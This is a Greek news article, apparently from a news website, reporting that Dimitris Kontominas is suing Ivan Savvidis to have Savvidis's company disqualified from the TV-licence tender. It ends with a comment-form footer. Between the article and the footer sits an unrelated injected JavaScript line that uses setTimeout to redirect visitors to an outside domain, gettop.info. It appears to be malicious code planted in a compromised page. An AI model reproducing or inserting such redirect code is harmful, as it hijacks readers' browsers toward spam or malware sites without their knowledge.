Κοντομηνάς «πυροβολεί» Ιβάν Σαββίδη με μήνυση και αγωγή

0
15

Ο Δημήτρης Κοντομηνάς κορυφώνει την επίθεσή του στον Ιβάν Σαββίδη, με στόχο να ακυρώσει τη συμμετοχή του στον διαγωνισμό για τις τηλεοπτικές άδειες, όπου ήρθε πρώτος επιλαχών. Καταθέτει μήνυση και αγωγή, ζητώντας να αποκλειστεί η εταιρεία του Dimera Media Investments, διότι παραβίασε -όπως υποστηρίζει- θεμελιώδεις αρχές του ελεύθερου ανταγωνισμού. Περιμένει δε μέσα στις επόμενες μέρες να δει το υλικό που κατέγραψαν οι κάμερες ασφαλείας τις 66 ώρες που διεξαγόταν ο διαγωνισμός. Η εισαγγελέας επέτρεψε να το δουν εκπρόσωποί του, όχι όμως  και να το πάρουν μαζί τους.

Ο ιδιοκτήτης του Αlpha αναφέρεται στις δηλώσεις του προέδρου του ΠΑΟΚ ότι ανέβαζε τεχνητά το τίμημα στον διαγωνισμό και, όταν έφτανε στην τελική φάση, έβαζε στον κλειστό φάκελο μηδενικά ποσά.

Υπενθυμίζουμε ότι ο Ιβάν Σαββίδης είναι πρώτος επιλαχών, έχοντας προσφέρει μισό εκατ ευρώ παραπάνω από τον ιδιοκτήτη του Alpha (61,5 εκατ έναντι 61 εκατ ευρώ). Α, λοιπόν. ακυρωθεί η συμμετοχή του, αυτομάτως γίνεται πρώτος επιλαχών ο Αlpha, οπότε μπορεί να διεκδικήσει μια άδεια αν εκπέσει η εγγυητική επιστολή του Γιάννη Βλαδίμηρου Καλογρίτσα –η εγγυητική επιστολή των 3 εκατ ευρώ είχε κατατεθεί 40 λεπτά μετά τις τρεις το μεσημέρι που έκλεινε το πρωτόκολλο.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here